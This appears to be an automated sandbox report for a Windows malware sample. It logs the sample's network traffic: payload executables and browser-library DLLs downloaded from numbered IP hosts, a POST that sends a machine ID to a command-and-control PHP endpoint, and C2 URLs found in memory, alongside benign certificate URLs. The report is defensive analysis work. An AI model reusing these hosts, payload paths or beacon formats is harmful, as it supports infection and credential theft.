                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00426504 __EH_prolog,SetThreadLocale,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,0_2_00426504
                            Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /ping.php?substr=eight HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /1/Qg_Appv5.exe HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: unknownDNS traffic detected: queries for: note.padd.cn.com
                            Source: unknownHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHCHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 43 33 43 30 30 35 46 39 45 36 34 31 32 30 30 32 31 34 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 2d 2d 0d 0a Data Ascii: ------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="hwid"59C3C005F9E64120021454------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="build"default10------JEGHJKFHJJJKJJJJKEHC--
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dll
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dllI
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dllc
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dllC
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php)
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php-minuser-l1-1-0
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpA
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpM
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpQ
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpY
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpa
                            Source: u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpc906315950e2729657ad6775bff99-release2f2345b38ae43488aec06
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpf
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpft
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpnts
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpt
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpu
                            Source: MSBuild.exe, 00000012.00000002.3318395339.00000000032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.66:9000
                            Source: MSBuild.exe, 00000012.00000002.3318395339.00000000032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://compositewpf.codeplex.com/
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
